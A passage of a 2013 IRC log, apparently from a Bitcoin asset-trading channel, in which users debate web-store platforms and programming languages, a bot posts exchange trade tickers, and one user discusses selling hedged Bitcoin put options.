01:49:06 I haven't even run it - I have a lot more experience with wordpress, but that experience makes me want to stay away from using WP as a storefront Jul 07 01:49:28 I know there are a few ruby/rails based options, Jul 07 01:49:42 i just wrapped an epic migration from magento 1.3 community to enterprise Jul 07 01:49:47 and aside from the conceived-in-hell EAV data store they fucked up Jul 07 01:49:54 derp derp derp Jul 07 01:49:58 :D Jul 07 01:50:16 if you don't mind hiring "experts" from all around the world to make your application dance, it's probably a solid choice Jul 07 01:50:20 what are your engineering requirements? Jul 07 01:50:36 do you need to be able to hire dirt-cheap PHP jockeys or will you and your friends maintain it yourself? Jul 07 01:50:44 yourselves* Jul 07 01:51:28 in the long run I might prefer the PHP route rather than derp around with effete rubyists Jul 07 01:51:41 [BTCTC] [ASICMINER-PT] 1 @ 4.194995 BTC [+] Jul 07 01:51:45 lulz Jul 07 01:51:51 being that I'm a semi-rubyist, in the short term I might like a ruby based option Jul 07 01:52:18 my problem is not effete rubyists, it's rails brogrammers Jul 07 01:52:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.04189 = 0.2932 BTC [-] Jul 07 01:52:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.041895 = 0.8379 BTC [+] Jul 07 01:52:43 ruby works just fine (again, premature optimization alert), but it's incredibly easy to make a non-performant site in it Jul 07 01:53:38 to be honest I don't really see many reasons to swing one way or another at this point Jul 07 01:53:54 and this is probably my inexperience speaking Jul 07 01:54:07 also look into magento's continuous integration environment Jul 07 01:54:18 which, man, i have no idea how rigorously you want to build your store Jul 07 01:54:21 i like the idea of magento since it's got a big community and good documentation Jul 07 01:54:45 yeah, this is the first webstore I'd be building Jul 07 01:54:50 heh. are you looking to become a magento expert? you can probably make more money doing that than operating your own store. Jul 07 01:55:14 if you're doing webdev in the states and want to invest in skills that will be attractive to the people who hire devs and dev teams, i would avoid php. Jul 07 01:55:46 but at the end of the day, languages are just languages, and anything you can do in one you can do in another Jul 07 01:55:57 turing tar pit :P Jul 07 01:56:08 that said Jul 07 01:56:19 some languages lend themselves to developer productivity Jul 07 01:56:30 now, if you're just deploying capital, who cares about developer productivity Jul 07 01:56:30 http://www.tagstand.com/ Jul 07 01:56:32 NFC Tags and Applications - Tagstand Jul 07 01:56:36 here's what I'd like to imitate Jul 07 01:56:51 aka steal wholesale :D Jul 07 01:57:05 I don't want to innovate for now Jul 07 01:57:18 I don't think that store has any particularly challenging engineering Jul 07 01:57:26 dat bootstrap Jul 07 01:57:44 it's just a CRUD app man Jul 07 01:57:53 do it in your favorite language Jul 07 01:57:58 and I'm working on an open source project with the programmer that programmed tagstand's NFC app **** BEGIN LOGGING AT Sun Jul 7 02:01:44 2013 Jul 07 02:02:25 i recently switched wholesale to clojure Jul 07 02:02:33 python's community /is/ pretty awesome for scientific programming / math programming Jul 07 02:02:37 oh fuck yeah Jul 07 02:02:47 that's how i started programming. controls systems in python and matlab. Jul 07 02:02:49 so it may be time to speak python, period Jul 07 02:03:05 ruby really ain't that great for?stuff. Jul 07 02:03:12 it's great for the web, though! Jul 07 02:03:18 you can totally learn to code your biz site, bro! Jul 07 02:03:20 no it's not. Jul 07 02:03:29 it'll be great! Jul 07 02:03:36 it's great for being owned on the web Jul 07 02:03:41 your cluster will erupt in flames under its first real load! Jul 07 02:03:56 like half of the bitcoin heists are traceable to ruby being a promiscuous piece of shit Jul 07 02:04:17 mp i'm kidding Jul 07 02:04:23 I mean, I love ruby, and with JRuby I might be able to expect decent runtimes - I know python is compiled now and is supposed to be blazing Jul 07 02:04:28 but.. well Jul 07 02:04:29 forget speed Jul 07 02:04:33 not your problem Jul 07 02:04:55 your problem is picking a language to live and breathe for the next n time periods Jul 07 02:05:04 that is if you want to get good at the thing Jul 07 02:05:16 if you just want to write passable code and pull down paychecks... Jul 07 02:05:21 ruby has always been a convenience thing - object oriented programming is much more light weight and actually tolerable compared to, say, java or (god forbid) c++ Jul 07 02:05:42 it's got groovy zen introspection, like your smalltalk Jul 07 02:06:04 it's got lambdas and other things that evoke the feeling of functional programming Jul 07 02:06:09 (my main language of choice is haskell) Jul 07 02:06:22 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.004301 = 0.0731 BTC [-] Jul 07 02:06:25 oh man Jul 07 02:06:30 (my main language of choice is haskell) // nice Jul 07 02:06:36 if you're a func-y, just spend the time to learn clojure. Jul 07 02:06:49 well, nvm. Jul 07 02:07:02 really my one peeve with python is that its asshole creator once made a statement completely discounting lambdas Jul 07 02:07:13 ... it's an immature reason to judge the language Jul 07 02:07:21 i find haskell really awesome, after having some functional prog background with OCaml mostly Jul 07 02:07:37 yeah, i wouldn't put that in the evaluation matrix Jul 07 02:07:51 benkay: tell me about your experience with clojure? Jul 07 02:07:56 *swoon* Jul 07 02:08:00 I tried it a few years back Jul 07 02:08:07 i'll embarras myself, man Jul 07 02:08:13 embarass* Jul 07 02:08:17 well, commercial experience Jul 07 02:08:20 interop with all of the things! Jul 07 02:08:28 ah, yeah Jul 07 02:08:35 write your full stack in one language Jul 07 02:08:42 been thinking of scala for that Jul 07 02:08:57 call functions client-side in ClojureScript and execute them on the server in Clojure Jul 07 02:09:00 kind of like a web-appropriate haskell Jul 07 02:09:09 it is also a lisp. Jul 07 02:09:39 did you get a chance to play with ClojureScript? Jul 07 02:09:46 probably not, back then. Jul 07 02:09:50 I don't think it existed back then Jul 07 02:09:51 [BTCTC] [DMS.MINING] 30 @ 0.019 = 0.57 BTC [-] Jul 07 02:09:53 well, professionally it's always a tough sell. Jul 07 02:10:05 except with clients who want to own and maintain the application. Jul 07 02:10:14 except -> especially Jul 07 02:10:15 hmm, I can has clojurescript as a replacement of javascript? Jul 07 02:10:19 yes. Jul 07 02:10:22 sold. Jul 07 02:10:23 that's the point. Jul 07 02:10:27 see? Jul 07 02:10:32 full-stack lisp Jul 07 02:10:40 you just got half your brain back. Jul 07 02:11:08 https://github.com/magomimmo/modern-cljs Jul 07 02:11:10 start there Jul 07 02:11:45 however it's not ecom ready. Jul 07 02:11:54 I'm suddenly very interested to find out what web platforms clojure has acretted in the time I've been away from it Jul 07 02:12:05 I know i'm late commenting, but in general, offering more payment methods will likely only have one negative consideration. It may act as a distraction. For web shopping, most any "step" or "option" is a potential moment of distraction. Each of these moments can be considered an obstactle to a sale, the goal being to have the least amount of resistance between the impulse to buy and Jul 07 02:12:05 completing a purchase. Jul 07 02:12:09 I'm sure there's a blog Jul 07 02:12:22 http://pit.btcmu.org/ Jul 07 02:12:25 Miner Stats Jul 07 02:12:29 if you user has not heard of bitcoin you may incite them to learn Jul 07 02:12:34 an thus be distracted Jul 07 02:12:45 .bait Jul 07 02:12:50 http://25.media.tumblr.com/tumblr_mdwmwptcyv1qdwh13o1_500.jpg Jul 07 02:13:01 I'm hoping clojure has a ecommerce solution Jul 07 02:13:07 clojure is evolving towards pluggable modules Jul 07 02:13:11 nah, not yet. Jul 07 02:13:12 guessing it has a more nuts and bolts rails-alike Jul 07 02:13:26 django is the batteries-included thing Jul 07 02:13:31 rails, meh. Jul 07 02:13:38 php, kill me now. Jul 07 02:13:48 yeah man Jul 07 02:13:49 hates rails Jul 07 02:13:59 loves ruby Jul 07 02:14:01 if all you want is a thing that serves stuff and is reasonably secure and performant and well documented, django's your gig Jul 07 02:14:35 i typically recommend it as a good framework for apps that clients want to maintain themselves, or be able to hire people to maintain themselves Jul 07 02:14:40 php definitely has gamed the "worse is better" aspect very well Jul 07 02:15:44 and I hate to give it to it, but worpress is great, and the actual PHP you have to do to use it is very very minimal, even when you're writing your own theme Jul 07 02:16:08 yo dawg Jul 07 02:16:11 we herd u can't code Jul 07 02:16:19 so we took the code out of your code Jul 07 02:16:25 so now you can web while you bro Jul 07 02:17:40 there is also the unquantifiable upside to writing the building blocks of a new ecosystem of web tech tools Jul 07 02:17:56 clojure's still young enough for that Jul 07 02:18:14 and it won't garner you fame or anything - everyone will always hate lisps Jul 07 02:18:23 but you'll be happy :) Jul 07 02:18:31 well, you *may* be happy. i have no idea. Jul 07 02:18:55 lol, even I hate lisp, mostly because it feels like someone was too lazy to write a parser Jul 07 02:19:15 although I have great fun using it, oddly Jul 07 02:19:23 but.. emacs lisp, for example? Jul 07 02:19:28 *revilement* Jul 07 02:20:14 so many people have spilled so much ink on the topic of languages Jul 07 02:20:54 i use what i feel like using when engineering req's don't clearly dictate alternatives, and when they do?i follow their directives. Jul 07 02:21:12 engineering/business req's Jul 07 02:21:36 yeah, I don't want to put negative words to lisp, mostly since I don't have the experience to have that right Jul 07 02:21:55 you could probably burn through joy of clojure pretty quickly Jul 07 02:22:06 i liked that book Jul 07 02:22:07 I'll try and open my mind here - I really love the idea of clojurescript Jul 07 02:22:16 *shrug* Jul 07 02:22:22 i have zero investment in your choice of languages. Jul 07 02:22:33 [BTCTC] [BITVPS] 42 @ 0.001651 = 0.0693 BTC [-] Jul 07 02:22:50 but an open mind towards programming paradigms has a lot of value to the programmer Jul 07 02:22:55 sure, and I want to get over prejudices in my choice Jul 07 02:23:05 whether the programmer has any value with those paradigms is a wholly different topic Jul 07 02:23:31 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.004301 = 0.0817 BTC [-] Jul 07 02:24:46 [BTCTC] [AMC-PT] 3 @ 0.0019 = 0.0057 BTC [+] Jul 07 02:25:27 definitely a JVM language will be great to have when/if I need to do android dev Jul 07 02:27:30 oh grovvy https://github.com/remvee/clojurehelloandroid Jul 07 02:28:05 yeah man Jul 07 02:28:21 clojure was designed to be hosted on all of the machines Jul 07 02:28:43 the mobile integrations aren't quiiiite there yet, but getting close for sure Jul 07 02:28:59 http://keminglabs.com/blog/angular-cljs-weather-app/ Jul 07 02:29:00 Building an iOS weather app with Angular and ClojureScript Jul 07 02:31:49 [HAVELOCK] [ASICM] 1 @ 0.0404205 BTC [-] Jul 07 02:33:21 [HAVELOCK] [ASICM] 1 @ 0.04042 BTC [-] Jul 07 02:36:52 [BTCTC] [DMS.MINING] 20 @ 0.018303 = 0.3661 BTC [-] Jul 07 02:36:54 [BTCTC] [DMS.MINING] 1 @ 0.018302 BTC [-] Jul 07 02:36:55 [BTCTC] [DMS.MINING] 20 @ 0.0183 = 0.366 BTC [-] Jul 07 02:36:57 [BTCTC] [DMS.MINING] 85 @ 0.018201 = 1.5471 BTC [-] Jul 07 02:36:58 [BTCTC] [DMS.MINING] 10 @ 0.01811 = 0.1811 BTC [-] Jul 07 02:37:00 [MPEX] [S.MPOE] 163 @ 0.00080267 = 0.1308 BTC [-] Jul 07 02:37:02 [MPEX] [S.MPOE] 6137 @ 0.0008024 = 4.9243 BTC [-] Jul 07 02:37:10 thanks for the conversation, benkay! Jul 07 02:37:48 I enjoyed it a lot, and you've given me some awesome directions to investigate Jul 07 02:37:53 anytime Jul 07 02:38:10 hey cads, check your pms Jul 07 02:39:57 I find it interesting how people seem incapable of seeing others as not having their own characteristics. Jul 07 02:46:37 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.004301 = 0.0086 BTC [-] Jul 07 02:48:17 [HAVELOCK] [ASICM] 1 @ 0.0404155 BTC [-] Jul 07 02:49:15 [HAVELOCK] [ASICM] 6 @ 0.03960201 = 0.2376 BTC [-] Jul 07 02:50:00 [HAVELOCK] [HIM] 1 @ 0.3515 BTC [-] Jul 07 02:50:57 [HAVELOCK] [ASICM] 1 @ 0.0403 BTC [+] Jul 07 02:51:13 [HAVELOCK] [ASICM] 1 @ 0.04029 BTC [-] Jul 07 02:52:10 [BTCTC] [AMC-PT] 1357 @ 0.00163 = 2.2119 BTC [-] Jul 07 02:52:12 [BTCTC] [AMC-PT] 36 @ 0.001629 = 0.0586 BTC [-] Jul 07 02:52:14 [BTCTC] [AMC-PT] 100 @ 0.001626 = 0.1626 BTC [-] Jul 07 02:52:15 [BTCTC] [AMC-PT] 100 @ 0.001619 = 0.1619 BTC [-] Jul 07 02:52:17 [BTCTC] [AMC-PT] 1 @ 0.001618 BTC [-] Jul 07 02:52:18 [BTCTC] [AMC-PT] 50 @ 0.001616 = 0.0808 BTC [-] Jul 07 02:52:19 [BTCTC] [AMC-PT] 150 @ 0.001615 = 0.2423 BTC [-] Jul 07 02:52:21 [BTCTC] [AMC-PT] 500 @ 0.001606 = 0.803 BTC [-] Jul 07 02:52:22 [BTCTC] [AMC-PT] 100 @ 0.001605 = 0.1605 BTC [-] Jul 07 02:52:23 [BTCTC] [AMC-PT] 2606 @ 0.001601 = 4.1722 BTC [-] Jul 07 02:52:28 [HAVELOCK] [ASICM] 1 @ 0.0404 BTC [+] Jul 07 02:52:58 [HAVELOCK] [ASICM] 6 @ 0.0404 = 0.2424 BTC [+] Jul 07 02:57:35 [BTCTC] [BASIC-MINING] 1 @ 0.186 BTC [+] Jul 07 02:58:53 [HAVELOCK] [HIM] 1 @ 0.3515 BTC [-] Jul 07 03:09:20 [BTCTC] [S.DICE-PT] 132 @ 0.00251 = 0.3313 BTC [+] Jul 07 03:09:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Jul 07 03:13:08 [BTCTC] [DMS.SELLING] 15 @ 0.02962 = 0.4443 BTC [-] Jul 07 03:13:10 [BTCTC] [DMS.SELLING] 40 @ 0.0296 = 1.184 BTC [-] Jul 07 03:14:10 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004301 = 0.0215 BTC [-] Jul 07 03:15:00 [BTCTC] [S.DICE-PT] 8 @ 0.00243 = 0.0194 BTC [-] Jul 07 03:15:02 [BTCTC] [S.DICE-PT] 200 @ 0.00243 = 0.486 BTC [-] Jul 07 03:15:03 [MPEX] [S.MPOE] 17651 @ 0.00080347 = 14.182 BTC [+] Jul 07 03:15:05 [BTCTC] [S.DICE-PT] 7 @ 0.00243 = 0.017 BTC [-] Jul 07 03:15:06 [MPEX] [S.MPOE] 849 @ 0.00080534 = 0.6837 BTC [+] Jul 07 03:15:07 [BTCTC] [S.DICE-PT] 12 @ 0.0024 = 0.0288 BTC [-] Jul 07 03:15:11 [BTCTC] [S.DICE-PT] 500 @ 0.002399 = 1.1995 BTC [-] Jul 07 03:15:11 [BTCTC] [S.DICE-PT] 355 @ 0.002372 = 0.8421 BTC [-] Jul 07 03:18:03 [BTCTC] [DMS.MINING] 4 @ 0.0185 = 0.074 BTC [+] Jul 07 03:18:51 [BTCTC] [DMS.MINING] 10 @ 0.018002 = 0.18 BTC [-] Jul 07 03:19:08 [BTCTC] [DMS.MINING] 1 @ 0.018 BTC [-] Jul 07 03:19:22 [BTCTC] [DMS.MINING] 1 @ 0.01651 BTC [-] Jul 07 03:19:33 [BTCTC] [DMS.MINING] 1 @ 0.0165 BTC [-] Jul 07 03:19:47 [BTCTC] [DMS.MINING] 11 @ 0.0163 = 0.1793 BTC [-] Jul 07 03:20:04 [BTCTC] [DMS.MINING] 31 @ 0.016001 = 0.496 BTC [-] Jul 07 03:20:19 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 07 03:20:21 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 07 03:20:21 [BTCTC] [DMS.MINING] 1 @ 0.016 BTC [-] Jul 07 03:21:02 [BTCTC] [DMS.MINING] 1 @ 0.0159 BTC [-] Jul 07 03:22:25 [BTCTC] [DMS.MINING] 8 @ 0.0159 = 0.1272 BTC [-] Jul 07 03:27:01 [MPEX] [S.MPOE] 7932 @ 0.00080534 = 6.388 BTC [+] Jul 07 03:41:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.041591 BTC [+] Jul 07 03:44:09 [HAVELOCK] [ASICM] 1 @ 0.04062 BTC [+] Jul 07 03:44:29 [HAVELOCK] [ASICM] 1 @ 0.040612 BTC [-] Jul 07 03:45:06 [HAVELOCK] [ASICM] 57 @ 0.040613 = 2.3149 BTC [+] Jul 07 03:45:08 [HAVELOCK] [ASICM] 1 @ 0.040613 BTC [+] Jul 07 03:45:16 [HAVELOCK] [ASICM] 1 @ 0.040614 BTC [+] Jul 07 03:48:04 [HAVELOCK] [ASICM] 3 @ 0.04096 = 0.1229 BTC [+] Jul 07 03:56:06 [BTCTC] [BASIC-MINING] 7 @ 0.183 = 1.281 BTC [-] Jul 07 04:01:42 [BTCTC] [S.DICE-PT] 198 @ 0.002549 = 0.5047 BTC [+] Jul 07 04:07:14 [HAVELOCK] [VTX] 2 @ 0.9 = 1.8 BTC [-] Jul 07 04:11:43 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004689 = 0.0141 BTC [+] Jul 07 04:13:19 [BTCTC] [AMC-PT] 1 @ 0.001934 BTC [+] Jul 07 04:15:43 [BTCTC] [DMS.SELLING] 50 @ 0.0303 = 1.515 BTC [+] Jul 07 04:16:14 [BTCTC] [DMS.PURCHASE] 31 @ 0.049083 = 1.5216 BTC [-] Jul 07 04:20:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.041583 = 0.0832 BTC [-] Jul 07 04:28:01 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [+] Jul 07 04:28:50 [BTCTC] [ASICMINER-PT] 1 @ 4.185 BTC [-] Jul 07 04:31:27 [BTCTC] [ASICMINER-PT] 1 @ 4.204995 BTC [+] Jul 07 04:44:59 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [-] Jul 07 04:51:05 [MPEX] [S.MPOE] 2963 @ 0.0008024 = 2.3775 BTC [-] Jul 07 04:51:06 [MPEX] [S.MPOE] 9100 @ 0.00080131 = 7.2919 BTC [-] Jul 07 04:51:22 [MPEX] [S.MPOE] 7037 @ 0.00080091 = 5.636 BTC [-] Jul 07 04:58:00 [HAVELOCK] [ASICM] 31 @ 0.04096 = 1.2698 BTC [+] Jul 07 04:59:28 [HAVELOCK] [ASICM] 5 @ 0.04096 = 0.2048 BTC [+] Jul 07 05:01:48 [HAVELOCK] [ASICM] 4 @ 0.041 = 0.164 BTC [+] Jul 07 05:09:48 [BTCTC] [BASIC-MINING] 60 @ 0.183 = 10.98 BTC [-] Jul 07 05:16:45 [BTCTC] [DMS.PURCHASE] 10 @ 0.049083 = 0.4908 BTC [-] Jul 07 05:18:41 [BTCTC] [DMS.SELLING] 6 @ 0.030999 = 0.186 BTC [+] Jul 07 05:18:47 [HAVELOCK] [SDICE] 25 @ 0.1783441 = 4.4586 BTC [-] Jul 07 05:18:49 [HAVELOCK] [SDICE] 20 @ 0.1783431 = 3.5669 BTC [-] Jul 07 05:18:50 [HAVELOCK] [SDICE] 11 @ 0.17834209 = 1.9618 BTC [-] Jul 07 05:18:50 [HAVELOCK] [SDICE] 1 @ 0.17833805 BTC [-] Jul 07 05:18:51 [HAVELOCK] [SDICE] 43 @ 0.178334 = 7.6684 BTC [-] Jul 07 05:27:25 [BTCTC] [AMC-PT] 462 @ 0.001623 = 0.7498 BTC [-] Jul 07 05:32:53 [HAVELOCK] [ASICM] 3 @ 0.041 = 0.123 BTC [+] Jul 07 05:34:38 [HAVELOCK] [ASICM] 147 @ 0.040611 = 5.9698 BTC [-] Jul 07 05:35:38 [HAVELOCK] [ASICM] 146 @ 0.040611 = 5.9292 BTC [-] Jul 07 05:35:44 [HAVELOCK] [ASICM] 196 @ 0.040611 = 7.9598 BTC [-] Jul 07 05:36:15 [HAVELOCK] [ASICM] 84 @ 0.040611 = 3.4113 BTC [-] Jul 07 05:36:17 [HAVELOCK] [ASICM] 10 @ 0.040611 = 0.4061 BTC [-] Jul 07 05:36:31 [HAVELOCK] [ASICM] 30 @ 0.040611 = 1.2183 BTC [-] Jul 07 05:37:16 [HAVELOCK] [ASICM] 1 @ 0.041 BTC [+] Jul 07 05:38:19 [HAVELOCK] [ASICM] 64 @ 0.040611 = 2.5991 BTC [-] Jul 07 05:39:17 [HAVELOCK] [ASICM] 3 @ 0.040611 = 0.1218 BTC [-] Jul 07 05:39:31 [HAVELOCK] [ASICM] 20 @ 0.040611 = 0.8122 BTC [-] Jul 07 05:39:43 [HAVELOCK] [ASICM] 1 @ 0.040611 BTC [-] Jul 07 05:41:17 [HAVELOCK] [ASICM] 5 @ 0.040836 = 0.2042 BTC [+] Jul 07 05:41:46 [HAVELOCK] [ASICM] 1 @ 0.040611 BTC [-] Jul 07 05:41:54 [HAVELOCK] [ASICM] 2 @ 0.040611 = 0.0812 BTC [-] Jul 07 05:41:59 [HAVELOCK] [ASICM] 1 @ 0.040611 BTC [-] Jul 07 05:42:05 [HAVELOCK] [ASICM] 2 @ 0.040612 = 0.0812 BTC [+] Jul 07 05:42:18 [HAVELOCK] [ASICM] 2 @ 0.040611 = 0.0812 BTC [-] Jul 07 05:42:25 [HAVELOCK] [ASICM] 1 @ 0.04061 BTC [-] Jul 07 05:42:34 [HAVELOCK] [ASICM] 1 @ 0.040611 BTC [+] Jul 07 05:42:48 [HAVELOCK] [ASICM] 5 @ 0.0407 = 0.2035 BTC [+] Jul 07 05:43:23 [HAVELOCK] [ASICM] 27 @ 0.040405 = 1.0909 BTC [-] Jul 07 05:46:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.041239 = 0.9485 BTC [-] Jul 07 05:47:31 i wonder how much of the money taken from ASICMINER went into MPOE or where it went in general ;P Jul 07 05:51:47 taken from ASICMINER? Jul 07 05:54:22 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004689 = 0.0281 BTC [+] Jul 07 05:56:04 Money moved out of ASICMINER slowly since dividend payment. Jul 07 05:56:17 !ticker btctc bitvps Jul 07 05:56:19 [BTCT:BITVPS] 1D: 0.00152 / 0.00166 / 0.001995 (992 shares, 1.6 BTC), 7D: 0.00089 / 0.00139 / 0.0035 (16151 shares, 22.4 BTC), 30D: 0.000637 / 0.00112 / 0.0035 (43883 shares, 49.3 BTC) Jul 07 05:56:51 [BTCTC] [BITVPS] 18 @ 0.001787 = 0.0322 BTC [+] Jul 07 05:57:07 I wouldn't pay money out on dividends for BITVPS. Jul 07 05:57:45 You should put anything that would go as dividends into cash on hand, and invest. :P Jul 07 06:01:50 ehrm... that's not the purpose of BitVPS Jul 07 06:06:19 Amazon it up yo Jul 07 06:06:20 no? Jul 07 06:07:04 [BTCTC] [S.DICE-PT] 50 @ 0.002377 = 0.1189 BTC [-] Jul 07 06:08:06 [BTCTC] [GSDPT] 61 @ 0.002199 = 0.1341 BTC [+] Jul 07 06:08:47 [BTCTC] [GSDPT] 1 @ 0.002199 BTC [+] Jul 07 06:10:21 [BTCTC] [S.DICE-PT] 200 @ 0.002378 = 0.4756 BTC [+] Jul 07 06:10:55 [BTCTC] [GSDPT] 220 @ 0.002199 = 0.4838 BTC [+] Jul 07 06:11:52 [BTCTC] [S.DICE-PT] 604 @ 0.002377 = 1.4357 BTC [-] Jul 07 06:12:19 [BTCTC] [GSDPT] 328 @ 0.002199 = 0.7213 BTC [+] Jul 07 06:12:54 [BTCTC] [GSDPT] 155 @ 0.0022 = 0.341 BTC [+] Jul 07 06:13:09 [BTCTC] [TAT.ASICMINER] 11 @ 0.040501 = 0.4455 BTC [-] Jul 07 06:13:42 [BTCTC] [GSDPT] 151 @ 0.002375 = 0.3586 BTC [+] Jul 07 06:13:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0405 = 0.405 BTC [-] Jul 07 06:14:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.04041 = 0.2021 BTC [-] Jul 07 06:15:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0405 BTC [+] Jul 07 06:15:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.040401 = 0.202 BTC [-] Jul 07 06:16:31 [BTCTC] [TAT.ASICMINER] 45 @ 0.040401 = 1.818 BTC [-] Jul 07 06:17:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.0404 = 0.202 BTC [-] Jul 07 06:17:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.040219 = 1.0055 BTC [-] Jul 07 06:18:15 [BTCTC] [TAT.ASICMINER] 12 @ 0.0401 = 0.4812 BTC [-] Jul 07 06:18:55 [HAVELOCK] [ASICM] 2 @ 0.041 = 0.082 BTC [+] Jul 07 06:18:56 [HAVELOCK] [ASICM] 8 @ 0.041 = 0.328 BTC [+] Jul 07 06:18:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.04001 = 0.12 BTC [-] Jul 07 06:20:21 [HAVELOCK] [ASICM] 29 @ 0.041 = 1.189 BTC [+] Jul 07 06:22:23 [BTCTC] [TAT.VIRTUALMINE] 57 @ 0.004689 = 0.2673 BTC [+] Jul 07 06:24:22 !last m s.mpoe Jul 07 06:24:23 Last trade for S.MPOE on MPEX was at 0.00080091 BTC [-] Jul 07 06:24:35 !help Jul 07 06:24:35 List of commands: Jul 07 06:24:36 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Jul 07 06:24:37 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Jul 07 06:24:38 !mp (desc: returns the response from MPEX order) Jul 07 06:24:39 !rules (desc: chan guidelines) {short: !r} Jul 07 06:24:40 !exchanges (desc: lists exchanges and brokers) {short: !e} Jul 07 06:27:43 [BTCTC] [ASICMINER-PT] 1 @ 4.135 BTC [-] Jul 07 06:28:22 [BTCTC] [BTC-BOND] 5 @ 0.00995 = 0.0498 BTC [-] Jul 07 06:28:27 [BTCTC] [TAT.VIRTUALMINE] 48 @ 0.004689 = 0.2251 BTC [+] Jul 07 06:28:42 [BTCTC] [ASICMINER-PT] 1 @ 4.13 BTC [-] Jul 07 06:29:13 [BTCTC] [TAT.VIRTUALMINE] 82 @ 0.00469 = 0.3846 BTC [+] Jul 07 06:29:15 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00469 = 2.345 BTC [+] Jul 07 06:30:14 [BTCTC] [TAT.VIRTUALMINE] 285 @ 0.0047 = 1.3395 BTC [+] Jul 07 06:30:16 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.0047 = 0.329 BTC [+] Jul 07 06:30:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 07 06:31:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00469 = 0.0094 BTC [-] **** BEGIN LOGGING AT Sun Jul 7 16:51:12 2013 Jul 07 16:52:18 ;;ticker Jul 07 16:52:21 MtGox BTCUSD ticker | Best bid: 69.00109, Best ask: 69.28796, Bid-ask spread: 0.28687, Last trade: 69.28797, 24 hour volume: 26550.16216519, 24 hour low: 66.60001, 24 hour high: 71.11212, 24 hour vwap: 68.67714 Jul 07 16:53:15 Ah right... .bait Jul 07 16:54:29 Ah, mircea. Withdrawals flush please Jul 07 16:57:21 aite Jul 07 16:59:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.041157 = 0.0823 BTC [+] Jul 07 17:01:25 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 07 17:11:34 hi Jul 07 17:11:56 [BTCTC] [DMS.MINING] 3 @ 0.019594 = 0.0588 BTC [+] Jul 07 17:12:13 Mornin Jul 07 17:12:18 how's it going Jul 07 17:12:34 i've been doing financial calculations all night and i am so confused Jul 07 17:12:36 Thank you. Jul 07 17:12:59 What kind of financial calculations, if I may ask? Jul 07 17:13:03 of course Jul 07 17:13:18 i am looking to delta hedge positions so i can sell options Jul 07 17:13:47 right now, the implied volatility of the options at the prices currently quoted is 300 Jul 07 17:13:57 while bitcoin is volatile, it isn't that volatile Jul 07 17:14:22 The options have a big premium currently Jul 07 17:14:32 based on a few different calculations, i think the MAX volatility is 50 Jul 07 17:14:34 I haven't traded options in a while Jul 07 17:14:37 me neither Jul 07 17:14:44 because of these huge premiums Jul 07 17:15:15 but, if i can sell options, at a much more lower price, i should be able to collect a decent amount of bitcoin Jul 07 17:15:46 and that would be where my delta hedging comes in Jul 07 17:15:52 but i am still working out the numbers Jul 07 17:16:08 if i sell a futures contract at the current price Jul 07 17:16:18 $68 let's say Jul 07 17:16:52 expiring at months end Jul 07 17:17:15 how covered am I if i sell an option that moves inversely Jul 07 17:17:38 for example, if i sell the future, i could sell a put Jul 07 17:18:42 since i profit from the future's contract if the price goes down, as long as my premium is at a certain price, i won't lose money in the total portfolio though i lose on the put, my future should hedge me Jul 07 17:18:46 [HAVELOCK] [ASICM] 18 @ 0.0406021 = 0.7308 BTC [-] Jul 07 17:19:25 it gets complicated when you start evaluating profits in btc vs profits in usd Jul 07 17:20:05 and also, since it is not possible to know how many bitcoins i would need as collateral, there is a little uncertainty in ROI Jul 07 17:21:59 and then there is the rolling forward return of the futures contract, which is extremely weird Jul 07 17:23:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.041157 BTC [+] Jul 07 17:24:40 Personally, I wouldn't buy or sell options right now Jul 07 17:24:52 where can i trade btc/usd futures? Jul 07 17:24:54 not without a premium that would make them crap Jul 07 17:32:29 hmmm Jul 07 17:32:46 for example, i think the 68put is around .3 btc to buy Jul 07 17:32:52 what if i offered it at .15 Jul 07 17:33:04 curious as to interest levels Jul 07 17:33:57 [BTCTC] [COGNITIVE] 1 @ 0.300091 BTC [-] Jul 07 17:35:30 I'll take them at 0.05 a piece Jul 07 17:35:32 would you be selling these via mpex? Jul 07 17:35:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.041157 BTC [+] Jul 07 17:35:48 [BTCTC] [COGNITIVE] 4 @ 0.30009 = 1.2004 BTC [-] Jul 07 17:38:28 .05 is a bit too low Jul 07 17:38:56 yeah way too low Jul 07 17:39:02 and yeah, i'd be selling them via mpex Jul 07 17:39:07 maybe .1ish would get you attention Jul 07 17:39:15 [BTCTC] [BFMINES] 1000 @ 0.004 = 4 BTC [+] Jul 07 17:39:19 so...selling puts at .1 could be interesting Jul 07 17:39:42 ;;ticker Jul 07 17:39:42 MtGox BTCUSD ticker | Best bid: 69.48659, Best ask: 69.50000, Bid-ask spread: 0.01341, Last trade: 69.47957, 24 hour volume: 